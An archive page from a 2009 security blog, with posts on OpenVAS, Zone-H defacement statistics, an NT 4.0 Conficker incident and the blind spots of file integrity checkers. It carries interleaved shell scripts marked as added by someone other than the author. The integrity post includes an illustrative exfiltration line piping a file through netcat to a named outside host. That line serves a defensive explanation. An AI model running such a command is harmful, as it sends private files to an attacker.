03.20.09

OpenVAS - a network security scanner

Posted in Information, OpenSourceSoftware, Security, OpenVAS at 9:33 am by Edward Bjarte Fjellskål

OpenVAS stands for Open Vulnerability Assessment System and is a network security scanner with associated tools like a graphical user front-end. The core component is a server with a set of network vulnerability tests (NVTs) to detect security problems in remote systems and applications.

OpenVAS products are Free Software under GNU GPL and a fork of Nessus.

The above is mostly cut and pasted from the OpenVAS website. I'm writing this blog post because I have talked to many security professionals who dislike that Nessus went closed source, and don't know about the OpenVAS fork.

OpenVAS-Server is a forked development of Nessus 2.2. The fork happened because the major development (Nessus 3) changed to a proprietary license model and the development of Nessus 2.2.x is practically closed for third party contributors. OpenVAS continues as Free Software under the GNU General Public License with a transparent and open development style.

And that is what we like, right?

03.18.09

Microsoft doesn't get Free Software, Linux and Security - Again.

Posted in Information, OpenSourceSoftware, Linux Distributions, Debian, Ubuntu, Security at 12:21 pm by Edward Bjarte Fjellskål

Yesterday, Computerworld.no wrote an article on the Police/Conficker/Free software debate going on here in Norway.

Information director Eirik Lae Solberg at Microsoft Norway had a chance to comment:
“- If one had used a similar Linux distribution from the same time, one would have significant security issues.”

That is only true if one did not upgrade! And in the GNU/Linux/Free Software world, one would not have any unmanageable issues upgrading.

I have personally managed lots of servers for large customers and universities, and when a new distribution release is out (take Debian as a very good example), you can change the package sources from the current release's repository to the new release's repository. With some rather simple command-line-fu, you can then upgrade to the latest major Debian version.

Ubuntu has made this easy for desktop users. Using a graphical front-end on your server (I don't), you can click your way to a distribution upgrade.

I still recommend having people in the loop who have done such an upgrade before you try this on your own. Always keep a working backup, and you could even try the upgrade in a virtual machine before you actually do it in production.
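The repository switch described above, as an added shell example that is not the author's own commands or any Debian tooling: it rewrites a copy of sources.list from one codename to the next, checks for lines still pointing at the old release (a forgotten third-party repository is the usual way a mixed upgrade goes wrong), and defines the upgrade step in the order the Debian release notes give (apt-get upgrade before dist-upgrade). The codenames etch and lenny, the mirror lines and the file path are assumptions for illustration; GNU sed -E is assumed.

```shell
#!/bin/sh
# Added example, not the author's own commands: re-point a Debian sources.list at
# the next release and run the upgrade in the order the Debian release notes give
# (upgrade first, then dist-upgrade). The codenames "etch" -> "lenny" and the
# mirror lines in the demo are assumptions for illustration. Needs GNU sed -E.

# rewrite_sources FILE OLD NEW: keep a copy as FILE.bak and rewrite the suite
# field of every deb/deb-src line from OLD (or OLD/updates, OLD-backports, ...)
# to NEW. The suite is matched only after the archive URL, so a mirror whose
# hostname or path happens to contain OLD is left alone.
rewrite_sources() {
    file=$1; old=$2; new=$3
    cp "$file" "$file.bak"
    sed -E "s#^(deb(-src)? +[^ ]+ +)$old([/-][a-z-]+)?( |\$)#\1$new\3\4#" \
        "$file.bak" > "$file"
}

# check_sources FILE OLD: fail if any line still names OLD as its suite, which is
# what a forgotten third-party repository looks like; a mixed sources.list is the
# usual way an upgrade goes wrong.
check_sources() {
    if grep -Eq "^deb(-src)? +[^ ]+ +$2([/-]| |\$)" "$1"; then
        echo "error: $1 still references $2" >&2
        return 1
    fi
}

# run_upgrade: the actual upgrade, to be run as root after the two steps above
# (and after a backup). Not executed by the demo below.
run_upgrade() {
    apt-get update && apt-get upgrade && apt-get dist-upgrade
}

# Demo on a constructed sources.list in a temp file (never touches /etc/apt).
demo_sources() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
deb http://ftp.no.debian.org/debian/ etch main contrib non-free
deb-src http://ftp.no.debian.org/debian/ etch main
deb http://security.debian.org/ etch/updates main contrib non-free
deb http://www.backports.org/debian etch-backports main
deb http://www.example.org/etch-tools/ stable main
EOF
    rewrite_sources "$f" etch lenny
    check_sources "$f" etch && cat "$f"
    rm -f "$f" "$f.bak"
}
demo_sources
```

Try it on a copy first; the demo only works on a temp file and never calls apt-get. The last mirror line in the demo keeps its "stable" suite untouched even though its path contains "etch", which is the case a naive global search-and-replace gets wrong.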

Eirik Lae Solberg even goes so far as to claim that Zone-H.org shows that Linux is more `hacked` than Windows… Using Zone-H.org as a reliable source for such a "scientific" statement is just what Microsoft is known for doing. Well, just to let you all know, if you bother to check Zone-H.org yourself, this is what you might find today:

$ GET http://zone-h.org/archive/special=1/page=1 | grep "<td>Linux" | wc -l
5
$ GET http://zone-h.org/archive/special=1/page=1 | grep "<td>Win" | wc -l
7

As you see: today's score is 5 boxes running Linux and 7 running Windows.

I wrote a quick bash script (get it here) to check the first 30 pages and print out the total sum:

$ bash bin/Eirik_Lae_Solberg.sh
Total Linux: 289
Total Microsoft: 390

To summarize: on the last 30 pages from Zone-H, 289 websites running Linux got defaced, while 390 websites running Windows got defaced.
(If you run the script yourself, the numbers will probably differ; these were today's numbers.)
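The linked script is not on this page, so here is an added reconstruction of the tally (not the author's script) that works over saved archive pages. It assumes the "<td>Linux" / "<td>Win" cell markup used in the one-liners above, uses curl for the fetch step instead of lwp-request's GET, and the two sample pages in the demo are constructed, not real Zone-H output. One deliberate difference from the one-liners: `grep | wc -l` counts matching lines, so two OS cells on one line count once; `grep -o` counts every cell.

```shell
#!/bin/sh
# Added example, not the script linked from the post: tally the OS column of
# saved Zone-H archive pages over N pages. Assumes GNU grep -o and the
# "<td>Linux" / "<td>Win..." cell markup quoted in the post; the sample pages
# built by make_sample are constructed for the demo.

# fetch_pages N DIR: save archive pages 1..N as DIR/page=K.html. This is the
# online step; the demo below does not run it. Uses curl rather than GET.
fetch_pages() {
    n=$1; dir=$2; mkdir -p "$dir"
    i=1
    while [ "$i" -le "$n" ]; do
        curl -s -o "$dir/page=$i.html" "http://zone-h.org/archive/special=1/page=$i"
        i=$((i + 1))
    done
}

# count_cells FILE PATTERN: number of "<td>PATTERN" cells in FILE. grep -o
# counts each match; the post's grep | wc -l would count matching lines only.
count_cells() {
    grep -o "<td>$2" "$1" | wc -l | tr -d ' '
}

# tally DIR: sum the per-page counts and print totals in the post's format.
tally() {
    linux=0; win=0
    for f in "$1"/page=*.html; do
        linux=$((linux + $(count_cells "$f" Linux)))
        win=$((win + $(count_cells "$f" Win)))
    done
    printf 'Total Linux: %d\nTotal Microsoft: %d\n' "$linux" "$win"
}

# make_sample DIR: two constructed pages. Page 1 packs two Windows cells on one
# line, which a line-based count would report as one.
make_sample() {
    mkdir -p "$1"
    printf '<tr><td>Linux</td></tr>\n<tr><td>Win 2003</td></tr><tr><td>Win 2000</td></tr>\n' \
        > "$1/page=1.html"
    printf '<tr><td>Linux</td></tr>\n<tr><td>Linux</td></tr>\n<tr><td>FreeBSD</td></tr>\n' \
        > "$1/page=2.html"
}

d=$(mktemp -d)
make_sample "$d"
tally "$d"        # Total Linux: 3 / Total Microsoft: 2
rm -rf "$d"
```

For the live numbers, call `fetch_pages 30 pages` first and then `tally pages`; the counts depend on whatever Zone-H lists on the day, as the post itself notes.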

So, given the hard facts and not the marketing propaganda that Eirik Lae Solberg from Microsoft wants you to believe, make up your own mind, and don't believe whatever you hear from Mister Microsoft…

BTW: Zone-H is not a good reference for measuring the security of operating systems, if you didn't know that… But it is a good way to point out that Eirik Lae Solberg doesn't know much about operating system security, and that he would rather focus on telling everyone that Microsoft is way better than everybody else…
For how long will you eat that lie?

03.13.09

Again… Update!

Posted in Information, OpenSourceSoftware, Security at 9:43 am by Edward Bjarte Fjellskål

I cannot believe that my tax money is, again, going to *d0rks*.

If you don't know anything about managing your IT systems, I would prefer that you outsource, or find some consultants who do!

Especially if you're in the Norwegian government, handling systems critical to society.

This time it's the Norwegian police having a visit from the now old Conficker worm…

Read more here and here.

According to this article, the police are still using Microsoft Windows NT 4.0!!!!!!

The last security update for NT 4.0 was released in 2004.
And you wonder how this could happen? And will it ever happen again?

Or will worse thing happen?

Update, Update, Updates…..

03.06.09

Why file integrity checking is not enough…

Posted in OpenSourceSoftware, Security at 11:35 am by Edward Bjarte Fjellskål

I was talking with two prominent security professionals today, and the topic of integrity checking was touched on. Got some food for thought…

(For more info on integrity checking, see: http://en.wikipedia.org/wiki/Samhain_(software), http://en.wikipedia.org/wiki/Open_Source_Tripwire or http://www.ossec.net/main/about/ )

If you run full integrity checking on all your file systems, you will have good knowledge of which changes are made to your system: changed files, new files, deleted files, etc. But for common use, seeing every temporary file written to disk (say a PHP session), every temporary file created or changed when someone logs in, or log files that constantly get new content and will hash differently each time you md5/sha1 them, might just be too much… or, if you have the time, good for you.

That's why most file integrity checkers are tuned by default to ignore *something*. So there will be places on the file system where files can be hidden from integrity checkers.

My point in all this is that a file integrity checker alone does not really give you any real insight into *bad things on your machine*. Why? Something might be in your memory… Take my last blog post as an example. That will give a shell on the system, but will not leave any new files or change existing ones, except for the Apache log file :) But every HTTP request changes that file too, so file integrity checking the live log file would not make much sense.

Say someone got a cmd/shell on your machine. Doing `cat somefile` would not, by default, trigger any normal integrity checker. Then doing `cat somefile | nc evil-storage-machine.ru 80` would go unnoticed by a file integrity checker: the file is read and sent over the network, but nothing on disk changes.

So you need something more…
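To make the two blind spots above concrete, here is an added shell example that is not Samhain, Tripwire or OSSEC code: a throwaway baseline/check built on sha256sum, with an assumed ignore list for /tmp and /var/log standing in for the "ignore *something*" defaults of real checkers. It shows that reading a file (which is all `cat somefile | nc ...` does locally) changes no hash, that a file dropped into an ignored path never appears in the report, and that only a write to a tracked file does. GNU coreutils (sha256sum, find -print0, sort -z, xargs -r) are assumed, and the file tree is constructed in a temp directory.

```shell
#!/bin/sh
# Added example (not Samhain, Tripwire or OSSEC code): a minimal file integrity
# baseline/check that shows the two blind spots discussed above. Assumes GNU
# coreutils (sha256sum, find -print0, sort -z, xargs -r). The ignore pattern is
# a made-up stand-in for the "ignore *something*" defaults of real checkers.
LC_ALL=C; export LC_ALL
FIM_IGNORE='\./(tmp|var/log)/'   # paths relative to the watched root, assumed

# fim_baseline ROOT OUT: write "sha256  ./path" for every regular file under
# ROOT that is not excluded by FIM_IGNORE.
fim_baseline() {
    ( cd "$1" && find . -type f -print0 | sort -z | xargs -0 -r sha256sum ) \
      | grep -Ev "^[0-9a-f]{64}  $FIM_IGNORE" > "$2" || true   # grep exits 1 when empty
}

# fim_check ROOT BASELINE: print NEW/DELETED/CHANGED lines comparing the tree
# with BASELINE. Prints nothing when no tracked file changed.
fim_check() {
    w=$(mktemp -d)
    fim_baseline "$1" "$w/now"
    sort "$2" > "$w/old.lines"; sort "$w/now" > "$w/new.lines"
    cut -c67- "$w/old.lines" | sort > "$w/old.paths"   # path starts after 64 hex + 2 spaces
    cut -c67- "$w/new.lines" | sort > "$w/new.paths"
    comm -13 "$w/old.paths" "$w/new.paths" | sed 's/^/NEW /'
    comm -23 "$w/old.paths" "$w/new.paths" | sed 's/^/DELETED /'
    # hash lines absent from the baseline whose path was already tracked: changed content
    comm -13 "$w/old.lines" "$w/new.lines" | cut -c67- | sort > "$w/diff.paths"
    comm -12 "$w/diff.paths" "$w/old.paths" | sed 's/^/CHANGED /'
    rm -rf "$w"
}

# Demo on a constructed tree in a temp dir.
demo_fim() {
    root=$(mktemp -d)
    mkdir -p "$root/etc" "$root/tmp"
    printf 'root:x:0:0:root:/root:/bin/sh\n' > "$root/etc/passwd"
    fim_baseline "$root" "$root.base"

    # 1. Reading a file (what `cat somefile | nc ...` does locally) changes no hash:
    cat "$root/etc/passwd" > /dev/null          # stands in for the nc upload
    echo "after read:   [$(fim_check "$root" "$root.base")]"

    # 2. A file dropped into an ignored path is invisible to the checker:
    printf 'dropped' > "$root/tmp/.backdoor"
    echo "after drop:   [$(fim_check "$root" "$root.base")]"

    # 3. Only a write to a tracked file shows up:
    printf 'evil::0:0::/:/bin/sh\n' >> "$root/etc/passwd"
    echo "after modify: [$(fim_check "$root" "$root.base")]"
    rm -rf "$root" "$root.base"
}
demo_fim
```

The first two reports are empty and only the third lists `CHANGED ./etc/passwd`; the read and the drop into /tmp leave no trace for this kind of tool, which is the point of the post. (Depending on mount options, a read may still update the file's atime, which some checkers can be configured to watch, but that is not what a hash comparison sees.)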